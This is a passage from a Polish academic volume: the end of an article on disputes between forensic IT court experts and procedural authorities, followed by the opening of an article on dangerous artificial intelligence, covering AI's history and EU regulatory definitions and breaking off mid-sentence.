sprawie, w której sąd prawidłowo obliczył wysokość wynagrodzenia, jednak – w
uzasadnieniu postanowienia o jego przyznaniu (zamiast w petitum tego
postanowienia) – poinformował o doliczeniu VAT, w przypadku biegłego, który
VATu nie płacił, co skutkowało błędnym naliczeniem końcowej kwoty należnej
do wypłaty. Oczywiście tak drobną omyłkę należy wyjaśnić, jak się wydaje,
242
zwykłą korespondencją z sądem (a dodatkowo zapewne kontaktując się z
księgowością sądu, zatrudnieni w której pracownicy sądu wyjaśnią wszelkie
wątpliwości i poproszą sędziego o zmianę postanowienia z jego własnej
inicjatywy), jednak – gdyby chcieć zapewnić zgodność z procedurami
postępowania, należałoby zastanowić się, czy możliwy jest tryb odwoławczy od
uzasadnienia postanowienia (tzn.: jak zwrócić się o zmianę postanowienia, nie co
do jego petitum, ale co do uzasadnienia).
Z psychologicznego punktu widzenia wątpliwości biegłego odnośnie do
poleceń organu procesowego prowadzą do sytuacji wysoce niekomfortowych,
szczególnie gdy mowa o bezpośrednich kontaktach, np. w czasie trwania rozprawy,
trzeba bowiem wykazać się wybitną asertywnością, aby na sali sądowej odmówić
wykonania polecenia sądu z uwagi na ich domniemaną bezprawność.
Ultrakrepidarianizm
5
Wykraczanie poza zakres swoich kompetencji jest wadą często
spotykaną u biegłych. Zdarza się to zarówno w sensie materialnym, jak i
formalnym. Z tym pierwszym mamy do czynienia, gdy biegły wypowiada się o
zagadnieniu nie należącym do dziedziny, w której został ustanowiony biegłym (w
opiniach biegłych informatyków można spotkać próby badania wydruków
komputerowych
6
, quasi-opiniowanie o pornograficznym charakterze zdjęć
7
, o
przyczynach uszkodzenia obudowy komputera
8
, o świadomym (lub
nieświadomym) pobieraniu bądź udostępnianiu plików, o „nielegalnym”
oprogramowaniu itd., z tym drugim: gdy narusza zasady postępowania.
W [2] opisano przypadek, w którym biegły postanowił samodzielnie
przeprowadzić eksperyment procesowy (wizję lokalną): „W omawianej sprawie
biegły nie tylko dokonał wizji lokalnej i przeprowadził eksperyment, ale także
przesłuchiwał w jego trakcie oskarżoną, pokrzywdzoną i świadka. Był
tak >>sumienny<<, że sporządził nawet protokół z wizji lokalnej i eksperymentu
procesowego, w których zamieścił >>zeznania przesłuchiwanych<<. Informacje
uzyskane tym sposobem przez biegłego stały się podstawą jego opinii, a nie
powinny. Taka opinia powinna być zdyskredytowana przez sąd, a niestety stała się
podstawą wydanych wyroków w obu instancjach. Mało tego, sąd wyższej instancji,
próbował konwalidować opinię biegłego, utrzymując, że biegły przeprowadził
eksperyment rzeczoznawczy. Z takim stwierdzeniem słusznie nie zgodził się Sąd
Najwyższy, stwierdzając w uzasadnieniu, że „eksperyment rzeczoznawczy nie
legalizuje ani przesłuchania przez niego (biegłego – przyp. autorki) uczestników
5
Termin ten oznacza wypowiadanie się poza obszarem kompetencji wypowiadającego, a pochodzi z
angedoty o słowach greckiego artysty Apellesa do szewca, który pozwolił sobie na krytykę jego
malarstwa: „Sutor, ne ultra crepidam” (lub „Ne sutor supra crepidam iudicet”) oznacza, że szewc nie
powinien wypowiadać się o niczym, poza sandałem (przedstawionym na obrazie).
6
Co jest specyficznym rodzajem badań pismoznawczych.
7
Co, jako konstatacja o przestępczym, bądź nie, charakterze czynu, należy do kompetencji organu
prowadzącego postępowanie.
8
O czym powinien się wypowiedzieć biegły z zakresu mechanoskopii
243
postępowania, ani tym bardziej wykorzystania ich oświadczeń i to również przez
Sąd odwoławczy”.
Niestety, zdarza się, że sądy wspierają czy zachęcają biegłych do
wykraczania poza granice swoich kompetencji. Jest to zrozumiałe, gdy dotyczy
próby błędnego przypisania pytania do dyscypliny reprezentowanej przez
biegłego: dla laika – jakim jest, w tym wypadku, sędzia – może nie być
oczywistym, czy problem dotyczy np. informatyki czy elektroniki. Trudno
natomiast zrozumieć rozszerzanie przez sąd czy organ prowadzący postępowanie
przygotowawcze zakresu opinii poza rozsądne granice bądź forsowanie próby
wymuszenia opinii niedopuszczalnej z punktu widzenia prawa.
Na przykład zdarza się oczekiwanie od biegłego analizy całości materiału
dowodowego, jak miało to miejsce w sprawie, która zakończyła się sporem
między biegłym a sądem przed sądem wyższej instancji (sąd meriti zarzucił
biegłemu wydanie nieprawidłowej opinii w związku z niepełną analizą akt sprawy
i w związku z tym obniżył jego wynagrodzenie, które to postanowienie biegły
zaskarżył). Sąd odwoławczy przyznał rację biegłemu pisząc m.in.: „W pierwszym
z wysłowionych w treści zaskarżonego postanowienia zastrzeżeniu o znaczeniu
istotnym, Sąd stwierdza, że biegli pominęli >>źródła dowodowe jakim były
zeznania świadków<<. Tak sformułowane zastrzeżenie rodzić może pytanie,
czego dotyczyło zlecenie Sądu kierowane pod adresem biegłych – wydania opinii
tylko w kwestiach wymagających wiedzy specjalnej, czy też wydania za sąd
swoistego orzeczenia w kwestii rozstrzygnięcia o zarzutach oskarżenia. W żadnym
wypadku zadanie biegłych nie może polegać na kompleksowej analizie wszelkich
zgromadzonych dowodów, w tym dowodów osobowych, dokonywania ich analizy
i formułowania opinii w oparciu o własną ocenę ich treści i – co najważniejsze –
wiarygodności. Ocena dowodów, w tym ocena zeznań i wyjaśnień, stanowi
wyłączną domenę sądu orzekającego” [3]. Można dodać, że akta sprawy liczyły
kilkadziesiąt tomów.
W innej sprawie prokurator wydał postanowienie o powołaniu
biegłego, w którym ten miał wypowiedzieć się, czy podejrzany popełnił
przestępstwo. Na uwagę biegłego, że nie jest jego rolą wyrokowanie o stanach
prawnych, prokurator surowo pouczył biegłego o karalności odmowy wydania
opinii. Biegły dostarczył opinię z dołączoną do niej opinią prawną o
niedopuszczalności udzielania odpowiedzi na tak postawione pytanie.
244
Oczywiście również biegłym zdarza się nieuzasadnione
wykraczanie poza zakres opinii
9
czy formalne błędy w jej konstrukcji
10
, o wiele
łatwiej jest jednak sądowi skorygować niedoskonałości narzędzia, jakim jest dla
niego biegły niż biegłemu, którego rola procesowa z natury rzeczy jest mocno
ograniczona, spierać się z gospodarzem postępowania.
Wnioski Pomijając zjawiska oczywiste, jak różne denotacje tych samych
pojęć w języku prawniczym i informatycznym (np. “uwierzytelnienie”,
“autoryzacja”, “norma”), rzeczywiście popełnione błędy merytoryczne
11
i
konstrukcyjne w opiniach (np. pominięcie uzasadnienia) czy kwestie związane z
nadmierną ekspresją emocji uczestników komunikacji, za istotną przyczynę
problemów w komunikacji między biegłym a organem procesowym można uznać
błędy formalne i proceduralne, w tym wiążące się z niezrozumieniem roli biegłego,
błędnym określeniem zakresu opinii, niewłaściwym podejściem do jej
stanowczości, konkludywności, pełności czy jasności. Błędy takie popełniają
zarówno biegli, jak i prawnicy (co zresztą jest jeszcze jednym dobitnym dowodem
na to, jak złe jest prawo regulujące funkcjonowanie specyficznej roli procesowej
biegłego sądowego), przy czym o ile zazwyczaj bardzo łatwo jest organowi
procesowemu wyjaśnić i naprawić pomyłki czy niewłaściwe zachowania biegłego,
o tyle sytuacja odwrotna związana jest z większymi trudnościami zarówno od
strony technicznej, jak i psychologicznej.
Jak się wydaje, przynajmniej częściowo można by uniknąć
niektórych problemów dopuszczając instytucje opinii konsultacyjnej (co
pozwoliłoby organowi procesowemu na formalne uzyskanie wiedzy niezbędnej
9
Mowa oczywiście o wykroczeniu poza zakres opinii nieuzasadnionym z merytorycznego punktu
widzenia, możliwe bowiem jest, że pojawi się konieczność wykonania dodatkowych badań
niezbędnych dla udzielenia odpowiedzi na pytania sądu (por. np. [4]: „jeżeli biegły będący specjalistą
w swojej dziedzinie, dojdzie do przekonania (i należycie stanowisko to uzasadni), że dla udzielenia
odpowiedzi na stawianemu mu pytania konieczne jest wyjście poza zakres szczegółowo wyznaczony
w postanowieniu dowodowym, powinien, a nawet ma obowiązek to uczynić”.
10
Warto w tym kontekście przytoczyć Wyrok [5]: „Treść (…) opinii biegłego (…) niewątpliwie
dawała podstawy do uzasadnionych wątpliwości co do jego bezstronności w sprawie. Opinia ta jest
pełna uwag niemerytorycznych, o silnym zabarwieniu emocjonalnym (…) Można znaleźć w niej
m.in. takie zwroty, jak: >>pieniactwo strony pozwanej<<, >>nie jest zadaniem biegłego edukowanie
pełnomocnika procesowego, który wręcz bzdury wypisuje<<, >>czy jest to bezmyślność
pełnomocnika strony pozwanej, czy brak kontroli nad tym, co się pisze w pismach
procesowych<<, >>pozwany wykazał się elementarnym brakiem wiadomości z zakresu organizacji i
zarządzania<<, >>każdy student I roku musi wiedzieć co to są wydatki antycypacyjne<<, >>aż
trudno sobie wyobrazić, że profesjonalny pełnomocnik strony pozwanej wykazuje elementarny brak
wiedzy w tym zakresie<<, >>nie byłoby ujmą, aby pozwany zapoznał się z książką autora: A. K.
Sprawność w procesie inwestycyjnym<<, >>czy można sobie wyobrazić bardziej absurdalny
zarzut<<, >>w sposób bezmyślny neguje trafność podjętych decyzji<<, >>skoro pozwany ma
wątpliwości i chce się dalej kompromitować>>, >>oprócz steku bzdur i niedorzeczności<<. Te
liczne, niemerytoryczne, pełne negatywnych emocji uwagi skierowane pod adresem pozwanego oraz
jego pełnomocnika w pełni potwierdzają podniesiony w skardze kasacyjnej zarzut braku
obiektywizmu biegłego (…) takie uwagi i oceny zawsze obniżają wartość opinii biegłego oraz godzą
w powagę wymiaru sprawiedliwości”.
11
Zob. np. [6].
245
do prawidłowego określenia zakresu opinii), normalizując przynajmniej główne
dyscypliny dla biegłych z listy (obecnie każdy SO prowadzi listę biegłych w
arbitralnie przyjętym własnym układzie) oraz ujednolicając i ujednoznaczniając
aktem rangi ustawowej przynajmniej najważniejsze przepisy o biegłych (np.
definicja pojęcia “biegły”, niedopuszczalność opiniowania odnośnie do ustalania
stanów faktycznych i prawnych, ujednolicenie – tam gdzie to możliwe –
przepisów formalnych dotyczących opiniowania w sprawach cywilnych, karnych,
administracyjnych i dyscyplinarnych itp.).
Bibliografia
1. Wójcikiewicz Józef, Autonomia biegłego w zakresie wyboru metod
badawczych oraz dopuszczalność tzw. metaopinii. Glosa do
postanowienia s.apel. z dnia 21 czerwca 2012 r., II AKz 386/12,
„Prokuratura i prawo” 10/2013, s. 139-143.
2. Kwiatkowska-Wójcikiewicz V.: Glosa do wyroku Sądu Najwyższego z
dnia 3 października 2006 r., sygn. IV KK 209/06, „Prokuratura i Prawo”
9/2009, s. 148-154
3. Postanowienie Sądu Apelacyjnego we Wrocławiu z 19 stycznia 2012 r.
(II A Kz 23/12) niepubl.
4. Wyrok Sądu Apelacyjnego w Katowicach z dnia 7 lipca 2017 (V ACa
640/16)
5. Wyrok Sądu Najwyższego z 14.02.2013 (II CSK 371/12)
6. Aleksandra Szaplonczay: Wadliwe opinie biegłych jako przyczyna
pomyłek sądowych w polskim procesie karnym. Sygnalizacje możliwości
naprawczych, „Studia Prawnicze. Rozprawy i Materiały” 2019, nr 1 (24),
s.221, DOI: 10.34697/2451-0807-sp-2019-1-014
246
NIEBEZPIECZNA SZTUCZNA INTELIGENCJA
DANGEROUS ARTIFICIAL INTELLIGENCE
dr Krzysztof Jan JAKUBSKI
Collegium Civitas Warszawa
Streszczenie
Autor definiuje sztuczną inteligencję jako maszynę, czyli sztuczny, złożony
cybernetyczny system komputer-oprogramowanie-osprzęt, o architekturze
poznawczo-funkcjonalnej i własnej lub odpowiednio dostępnej (przyłączonej)
mocy obliczeniowej o wymaganych pojemnościach i szybkości, pozwalający na
wykonywanie zachowań wymagających procesu uczenia się i uwzględniania
nowych okoliczności w toku rozwiązywania danego problemu i który może w
różnym stopniu – w zależności od konfiguracji – działać autonomicznie oraz
wchodzić w interakcje z otoczeniem Maszyna będąca sztuczną inteligencją jest
systemem informatycznym z logiką operacyjną (modele algorytmów) oraz
aparatem wykonawczym, które łączą spójne relacje. Prezentuje jej kluczowe
elementy algorytmy, sposoby uczenia maszynowego i wspomina o roli
niezbędnych do uczenia dużych zbiorów danych. W oparciu o dane źródłowe i
przykłady prezentuje wybrane możliwości ataku na systemy AI oraz możliwości
niebezpiecznego wykorzystania aplikacji AI.
Słowa kluczowe: Sztuczna inteligencja (AI), zagrożenia dla sztucznej inteligencji,
bezpieczeństwo sztucznej nteligencji (AI-Safety), przestępczość związana ze
sztuczną inteligencją (AI-Crime)
Abstract
The author defines artificial intelligence as a machine, i.e. an artificial, complex
cybernetic computer-software-hardware system, with a cognitive-functional
architecture and its own or appropriately available (connected) computing power
with the required capacity and speed, allowing it to perform behaviors that require
the process of learning and taking into account new circumstances in the course of
solving a given problem and which can, to varying degrees - depending on the
configuration - operate autonomously and interact with the environment. An
artificial intelligence machine is an IT system with operational logic (algorithm
models) and an executive apparatus that connect coherent relationships. It presents
its key elements, algorithms, machine learning methods and mentions the role of
large data sets necessary for learning. Based on source data and examples, it
presents selected possibilities of attacking AI systems and possibilities of
dangerous use of AI applications.
247
Keywords: artificial intelligence (AI), threats to artificial intelligence, artificial
intelligence safety (AI-Safety) artificial intelligence crime (AI-Crime)
WSTĘP
Sztuczna inteligencja (ang. Artificial Intelligence, AI) oraz pojęcia
"Machine Learning" (ML, uczenie maszynowe), "Deep Learning" (DL, głębokie
uczenie maszynowe) - to słowa klucze, od lat rozpalające umysły i wyobraźnię
literatów, naukowców, wizjonerów, wynalazców, programistów, innowatorów i
przedstawicieli przemysłu na całym świecie. Techniki sztucznej inteligencji są
rozwijane od lat. Jednakże wraz ze wzrostem mocy obliczeniowej komputerów
oraz usprawnianiem komunikacji między urządzeniami skala ich zastosowań
zaczęła szybko rosnąć. Według danych CB Insights i Europejskiego Biura
Patentowego w roku 2017 chińskim podmiotom przyznano 641 patentów z
zakresu AI. Podmioty amerykańskie otrzymały zaledwie 131 patentów. Nieco
inaczej wygląda sytuacja w zakresie systemów uczących się. W tym samym 2017
roku Amerykanom przyznano 882 patenty w tej dziedzinie, Chińczykom 771. W
latach 2010–2019 w bazie Scopus zidentyfikowano łącznie około 751,2 tys. prac
naukowych związanych z tematyką sztucznej inteligencji. Każdego roku
publikowano coraz więcej prac naukowych z obszaru AI. W 2019 roku dorobek
publikacyjny z zakresu AI był ponad 2,5-krotnie większy niż na początku dekady.
Najwięcej prac naukowych z obszaru AI opublikowali naukowcy z Chin (207 tys.),
Stanów Zjednoczonych (117 tys.) oraz Indii (72 tys.). Autorzy prac naukowych z
obszaru sztucznej inteligencji w swoich pracach najczęściej poruszali tematykę
związaną z algorytmem genetycznym, eksploracją danych, sztucznymi sieciami
neuronowymi oraz uczeniem głębokim. Wśród państw Unii Europejskiej
najwięcej prac powstało w Wielkiej Brytanii (38,3 tys.), której dorobek
publikacyjny z zakresu AI był czwartym co do wielkości na świecie. Wśród
państw UE z największą liczbą publikacji o tematyce sztucznej inteligencji w 2019
roku największy wzrost w latach 2010–2019 w udziale unijnych publikacji
zanotowano w Wielkiej Brytanii (+3,4 p.p.) oraz Niemczech (+2,5 p.p.). Z kolei
największy spadek wystąpił w Hiszpanii (-3 p.p.), Grecji (-1,0 p.p.) oraz Polsce (-
0,8 p.p.). Tematyka prac tworzonych w UE obejmowała przede wszystkim
zagadnienia algorytmu genetycznego, przetwarzania obrazów, eksploracji danych
i uczenia głębokiego
1
.
Ale sztuczna inteligencja to też wyzwanie dla osób zajmujących się
cyberbezpieczeństwem, kryminologów oraz pracowników organów ścigania i
wymiaru sprawiedliwości. Zdając sobie sprawę z obszerności zagadnienia, w
1
Sztuczna inteligencja a sektor nauki i szkolnictwa wyższego. Przegląd dokumentów strategicznych
i osiągnięć na świecie. Raport opracowany na zlecenie Ministerstwa Nauki i Szkolnictwa Wyższego,
Ośrodek Przetwarzania Informacji – Państwowy Instytut Badawczy, Warszawa 2020,
https://radon.nauka.gov.pl/analizy/strategieSI
248
niniejszej publikacji chcę przedstawić subiektywnie wybrane, podkreślam słowo
wybrane, elementy wskazujące na niebezpieczne strony AI. Niniejsza publikacja
jest efektem trzydziestoletniego badania kwestii związanych z przestępczością
komputerową, kilkunastu lat obserwacji rozwoju sztucznej inteligencji i oparta jest
o fragmenty z przygotowywanej przeze mnie dużej monografii „Przestępcze
oblicze sztucznej inteligencji”. Starając się ograniczyć szczegółowe opisy
wskazuję źródła i sygnalizuję problemy. Celowo także uwypuklam rys historyczny
aby podkreślić to, że rozwój sztucznej inteligencji nie jest czymś, co powinno
zaskakiwać kryminologów oraz pracowników organów ścigania i wymiaru
sprawiedliwości. Nie chciałbym, by powtórzyła się sytuacja analogiczna do
polskiego modelu zwalczania przestępczości komputerowej - o której uważany
przez wielu badaczy za twórcę i ojca wiedzy o niej Donn B. Parker pisał już na
przełomie lat sześćdziesiątych i siedemdziesiątych XX wieku
2
– a polskie
struktury do jej zwalczania z bólem rodziły się praktycznie dopiero od początku
XXI wieku
3
i jeszcze nie osiągają zadowalających wyników. Publikację
podzieliłem na dwa podrozdziały. W pierwszym staram się wyjaśnić pojęcie
sztucznej inteligencji i scharakteryzować jej podstawowe elementy. W drugiej
części prezentuję wybrane zagrożenia dotyczące zarówno procesu tworzenia
systemów AI jak i potencjalnego niebezpiecznego wykorzystania aplikacji
opartych o AI.
Wszystkie informacje, stan prawny i linki są aktualne na dzień 15 lutego 2024 r. -
wobec szybkich zmian w dziedzinie AI podanie tej daty jest niezbędne.
POJĘCIE SZTUCZNEJ INTELIGENCJI I JEJ KLUCZOWE ELEMENTY
Człowiek od zarania dziejów stara się doprowadzić do tego, by maszyna
w jak największym stopniu go zastąpiła, w tym również w pracy umysłowej.
Abakus, prekursor liczydła i maszyn liczących, czyli deska z wyżłobionymi
rowkami, ułatwiająca liczenie, używana była w Rzymie i Grecji od 440 p.n.e. do
XVIII wieku. Słowa Kartezjusza, który jako pierwszy wspomniał, że pewnego
dnia maszyny będą w stanie podejmować decyzje i postępować w inteligentny
sposób, będące w XVII wieku metaforą, w XXI stają się rzeczywistością.
Przełomem okazał się gwałtowny rozwój elektroniki i informatyki w drugiej
połowie XX wieku. Tego przełomu oczywiście by nie było, gdyby nie koncepcja
maszyny analitycznej Charlesa Babbage’a i pierwszy program komputerowy do
niej - stworzone w latach 1833 – 1843 - a których idee i założenia znajdujemy w
maszynach i programach tworzonych współcześnie. Warto również wspomnieć o
skonstruowanych w latach 1936 – 1941, przez Konrada Zusego, komputerach
zerowej generacji serii Z, wyprzedzających swoją epokę (współczesnym
komputerom, mimo iż oparte są one na układach elektronicznych, pod względem
2
Por. Schjolberg S., The History of Cybercrime Third edition, Books on Demand (BoD), 2020, s. 19;
zob. także biogram Donna B. Parkera opublikowany na stronie
https://history.computer.org/pioneers/parker-db.html
3
Jakubski K.J., Analiza działań rządowych w zakresie cyberbezpieczeństwa za okres trwania TAPT,
[w:] Przestępczość teleinformatyczna 2017 (red.) J. Kosiński, Wyd. WSPol. Szczytno 2018. s. 13-
41
249
działania bliżej jest właśnie do tego niemieckiego projektu, niż do amerykańskiego
ENIAC-a). Trudno też powiedzieć w jakim kierunku nastąpiłby rozwój AI, gdyby
nie było w 1950 roku publikacji w kwartalniku „Mind” artykułu “Computing
Machinery and Intelligence” (Maszyny obliczeniowe oraz inteligencja) Alana
Mathisona Turinga
4
oraz odbytej latem 1956 roku dwumiesięcznej konferencji w
Dartmouth College, gdzie 20 wybitnych naukowców pod kierownictwem
organizatora Johna McCarthy’ego zastanawiało się, jak wykorzystać gwałtowny
rozwój elektroniki dla dobra ludzkości oraz rozpatrzyć możliwości zbudowania
maszyny „zdolnej do zasymulowania każdego aspektu ludzkiej inteligencji”
5
.
Warsztaty w Dartmouth nie doprowadziły do jakichś szczególnych innowacji, ale
służyły skupieniu wszystkich głównych bohaterów tej dyscypliny. Przez
następnych kilka lat pole to będzie zdominowane przez uczestników tych
warsztatów, ich studentów i kolegów z Massachusetts Institute of Technology
(MIT), Carnegie Mellon University (CMU), Stanford University i International
Business Machines Corporation (IBM)
6
. A jej wpływ na badania i rozwój w
dziedzinie inżynierii, matematyki, informatyki, psychologii i wielu innych jest
niezaprzeczalny. Wtedy też jej organizator, po raz pierwszy użył pojęcia artificial
intelligence (sztuczna inteligencja)
7
, tylko po to, by uniknąć skojarzeń tematyki
konferencji z cybernetyką
8
, a Marvin Minsky zdefiniował ją jako „naukę o
maszynach realizujących zadania, które wymagają inteligencji od człowieka”. Od
lat ciągle trwa dyskusja czym jest faktycznie sztuczna inteligencja i jak ją
zdefiniować. Różne definicje sztucznej inteligencji wynikają z rozbieżności
spojrzeń na tą technologię ze strony różnych dziedzin nauki, na potrzeby których
tworzy się tą definicję. Badania nad sztuczną inteligencją wykorzystują bowiem
narzędzia i ustalenia z wielu dziedzin, m.in. informatyki, psychologii, filozofii,
neuronauki, kognitywistyki, lingwistyki, badań operacyjnych, ekonomii, teorii
sterowania, prawdopodobieństwa, optymalizacji i logiki. Przez użycie terminu
„inteligencja”, należącego do języka psychologii i języka potocznego, przez wielu
rozumianego dosłownie, termin „sztuczna inteligencja” jest źródłem wielu
nieporozumień oraz używania niezdefiniowanego pojęcia AI z milczącym
założeniem, że pojęcie jest tak samo rozumiane przez wszystkich uczestników
4
Turing A.M., Computing Machinery and Intelligence, Mind, Volume LIX, Issue 236, October 1950,
s. 433–460, https://doi.org/10.1093/mind/LIX.236.433. Turing już w 1936 r. wykazał, że w zasadzie
wszelkie możliwe obliczenia mogą zostać wykonane przez system matematyczny nazywany obecnie
uniwersalną maszyną Turinga – Turing A.M., On Computable Numbers with an Applikation to the
Entscheidungsproblem, Proceedings of the London Mathematical Society, 1936, series 2, nr 42/3-
42/4. Przedruk w: Davis M. (ed.), The Undecidable Propositions, Unsolvable Problems, and
Computable Functions, Raven Press, Hewlett, NY 1965, s. 116-153
5
Kaplan J., Humans Need Not Apply: A Guide to Wealth and Work in the Age of Artificial
Intelligence, Yale University Press 2015, s. 19; Kaplan J., Sztuczna inteligencja. Co każdy powinien
wiedzieć, PWN 2022, s. 29-33
6
Por. Russell S., Norvig P., Sztuczna inteligencja. Nowe spojrzenie Wydanie IV. Tom 1, Helion
2023, s. 36-39
7
McCarthy J., Minsky M., Rochester N., Shannon C., A Proposal for the Dartmouth Summer
Research Project on Artificial Intelligence, August 31, 1955, AI Magazine 2006, Vol. 27(4), s. 12-14,
https://doi.org/10.1609/aimag.v27i4.1904
8
Kaplan J., Sztuczna inteligencja. Co każdy powinien wiedzieć, PWN 2022, s. 30
250
dyskusji, na co zwraca uwagę Tomasz Zalewski
9
. Informatykom zajmującym się
sztuczną inteligencją bliższe są raczej sformułowania mówiące o zachowaniu i
racjonalności, a psychologom i filozofom raczej te mówiące o myśleniu i
naśladowaniu człowieka. Oczywiście każde z tych sformułowań samo w sobie
może być przedmiotem dyskusji. W informatyce i kognitywistyce oznacza
tworzenie modeli i programów symulujących choć częściowo zachowania
inteligentne. Tworzenie ciągle nowych, uzależnionych od bieżących potrzeb
definicji nie zawsze określających faktyczne znaczenie przedmiotu dyskusji,
powoduje często powstawanie skomplikowanych, złożonych konstrukcji
logicznych nie tylko mało zrozumiałych, co podkreślających wcale nie
najważniejsze elementy i cechy AI. Obecnie wzmożone zainteresowanie tą
technologią może doprowadzić do ukucia się ostatecznego terminu lub wręcz
przeciwnie – zrazić ludzi do demonizowanego niekiedy „inteligentnego robota”
spopularyzowanego w filmie Stanleya Kubricka z 1968 r. "2001: Odyseja
kosmiczna". Z tego powodu pojawiają się głosy wzywające do ponadnarodowej
regulacji inteligentnych systemów. W 2017 r. Rada Europejska wskazała na
potrzebę „świadomości, że nowe trendy wymagają pilnej reakcji”, co obejmuje
„kwestie takie jak sztuczna inteligencja (...) przy zapewnieniu wysokiego poziomu
ochrony danych, praw cyfrowych i standardów etycznych”
10
. W konkluzjach z
2019 r. na temat dokumentu pt. „Skoordynowany plan w sprawie rozwoju i
wykorzystania sztucznej inteligencji opracowanej w Europie” Rada podkreśliła
również znaczenie zapewnienia pełnego poszanowania praw obywateli Unii i
wezwała do zmiany istniejących odnośnych przepisów w celu ich dostosowania
do nowych możliwości i wyzwań generowanych przez sztuczną inteligencję
11
.
Rada Europejska wezwała również do jasnego określenia zastosowań AI, które
należy uznać za zastosowania wysokiego ryzyka
12
. W dniu 19 lutego 2020 r.
Komisja Europejska opublikowała białą księgę w sprawie sztucznej inteligencji –
Europejskie podejście do doskonałości i zaufania, w którym “sztuczna inteligencja
to zbiór technologii łączących dane, algorytmy i moc obliczeniową”
13
. Parlament
Europejski prowadzi wiele prac w obszarze sztucznej inteligencji, którą definiuje
jako „zdolność maszyn do wykazywania ludzkich umiejętności, takich jak
9
Zalewski T., Definicja sztucznej inteligencji, [w:] Lai L., Świerczyński M. (red.), Prawo sztucznej
inteligencji, CHBeck 2020, s. 1
10
Rada Europejska, Posiedzenie Rady Europejskiej (19 października 2017 r.) – Konkluzje EUCO
14/17, 2017, s. 8, https://www.consilium.europa.eu/media/21610/19-euco-final-conclusions-pl.pdf
11
Rada Unii Europejskiej, Sztuczna inteligencja b) Konkluzje na temat skoordynowanego planu w
sprawie sztucznej inteligencji – Przyjęcie 6177/19, 2019,
https://data.consilium.europa.eu/doc/document/ST-6177-2019-INIT/pl/pdf
12
Rada Europejska, Nadzwyczajne posiedzenie Rady Europejskiej (1 i 2 października 2020 r.) –
Konkluzje, EUCO 13/20, 2020 r., https://www.consilium.europa.eu/media/45927/021020-euco-final-
conclusions-pl.pdf
13
Komisja Europejska „Biała księga w sprawie sztucznej inteligencji. Europejskie podejście do
doskonałości i zaufania”, COM(2020) 65 final, 2020 r.
https://ec.europa.eu/info/sites/default/files/commission-white-paper-artificial-intelligence-
feb2020_pl.pdf . Por. także - Komisja Europejska, A European approach to artificial intelligence,
Shaping Europe’s digital future, https://digital-strategy.ec.europa.eu/pl/policies/european-approach-
artificial-intelligence
251
rozumowanie, uczenie się, planowanie i kreatywność”
14
. W październiku 2020 r.
PE przyjął szereg rezolucji związanych z AI, w tym w sprawie aspektów
etycznych
15
, odpowiedzialności
16
i praw autorskich
17
. W 2021 r. w dalszej
kolejności przyjęto rezolucje w sprawie sztucznej inteligencji w sprawach
karnych
18
i w sektorze edukacji i kultury oraz w sektorze audiowizualnym
19
. W
dniu 21 kwietnia 2021 r. do Parlamentu Europejskiego wpłynął wniosek,
przygotowany przez Dyrekcję Generalną ds. Sieci Komunikacyjnych, Treści i
Technologii Komisji Europejskiej dotyczący rozporządzenia ustanawiającego
zharmonizowane przepisy dotyczące sztucznej inteligencji (akt w sprawie
sztucznej inteligencji)
20
. Definicję systemu sztucznej inteligencji, inną niż we
wcześniejszych aktach prawnych, sformułowano w nim w taki sposób, aby w
możliwie największym stopniu była neutralna pod względem technologicznym i
nie ulegała dezaktualizacji, biorąc pod uwagę szybki rozwój technologiczny i
rozwój sytuacji rynkowej w dziedzinie AI. W świetle tego aktu prawnego „system
14
Sztuczna inteligencja: co to jest i jakie ma zastosowania?, Parlament Europejski, Aktualności –
Społeczeństwo, ostatnia aktualizacja: 26-04-2021,
https://www.europarl.europa.eu/news/pl/headlines/society/20200827STO85804/sztuczna-
inteligencja-co-to-jest-i-jakie-ma-zastosowania
15
Rezolucja Parlamentu Europejskiego z dnia 20 października 2020 r. w sprawie ram aspektów
etycznych sztucznej inteligencji, robotyki i powiązanych z nimi technologii. Sztuczną inteligencje
zdefiniowano w niej jako „ system, który jest oparty na oprogramowaniu lub wbudowany w
urządzenia sprzętowe i który wykazuje inteligentne zachowanie poprzez, między innymi, zbieranie,
przetwarzanie, analizowanie i interpretowanie swojego środowiska oraz poprzez podejmowanie
działań z pewnymi stopień autonomii w osiąganiu określonych celów”
https://oeil.secure.europarl.europa.eu/oeil/popups/ficheprocedure.do?lang=en&reference=2020/2012(
INL)
16
Rezolucja Parlamentu Europejskiego z dnia 20 października 2020 r. w sprawie systemu
odpowiedzialności cywilnej za sztuczną inteligencję. W świetle tego dokumentu "„system sztucznej
inteligencji” oznacza system, który opiera się na oprogramowaniu albo jest wbudowany w
urządzenia, wykazuje się zachowaniem symulującym inteligencję m.in. w oparciu o gromadzenie i
przetwarzanie danych, analizowanie i wyciąganie wniosków dotyczących otoczenia oraz podejmuje
działania w pewnym stopniu autonomicznie, aby osiągnąć konkretne cele",
https://www.europarl.europa.eu/doceo/document/TA-9-2020-0276_PL.html
17
Rezolucja Parlamentu Europejskiego z dnia 20 października 2020 r. w sprawie praw własności
intelektualnej w dziedzinie rozwoju technologii sztucznej inteligencji,
https://www.europarl.europa.eu/doceo/document/A-9-2020-0176_PL.html
18
Projekt sprawozdania Parlamentu Europejskiego na temat sztucznej inteligencji w prawie karnym
i jej stosowania przez policję i organy wymiaru sprawiedliwości w sprawach karnych,
https://oeil.secure.europarl.europa.eu/oeil/popups/ficheprocedure.do?lang=en&reference=2020/2016(
INI)
19
Projekt sprawozdania Parlamentu Europejskiego w sprawie sztucznej inteligencji w sektorze
edukacji i kultury oraz w sektorze audiowizualnym,
https://oeil.secure.europarl.europa.eu/oeil/popups/ficheprocedure.do?reference=2020/2017(INI)&l=e
n. W tym kontekście Komisja przyjęła „Plan działania w dziedzinie edukacji cyfrowej na lata 2021–
2027. Nowe podejście do kształcenia i szkolenia w epoce cyfrowej”, w którym przewidziano
opracowanie wytycznych etycznych dotyczących sztucznej inteligencji i wykorzystania danych w
kształceniu – komunikat Komisji COM(2020) 624 final.
20
Wniosek Rozporządzenia Parlamentu Europejskiego i Rady ustanawiające zharmonizowane
przepisy dotyczące sztucznej inteligencji (akt w sprawie sztucznej inteligencji) i zmieniające niektóre
akty ustawodawcze unii {SEC(2021) 167 final} - {SWD(2021) 84 final} - {SWD(2021) 85 final},
COM(2021) 206 final 2021/0106(COD), https://eur-lex.europa.eu/legal-
content/PL/ALL/?uri=CELEX:52021PC0206
252
sztucznej inteligencji oznacza oprogramowanie opracowane przy użyciu co
najmniej jednej spośród technik i podejść wymienionych w załączniku I, które
może – dla danego zestawu celów określonych przez człowieka – generować
wyniki, takie jak treści, przewidywania, zalecenia lub decyzje wpływające na
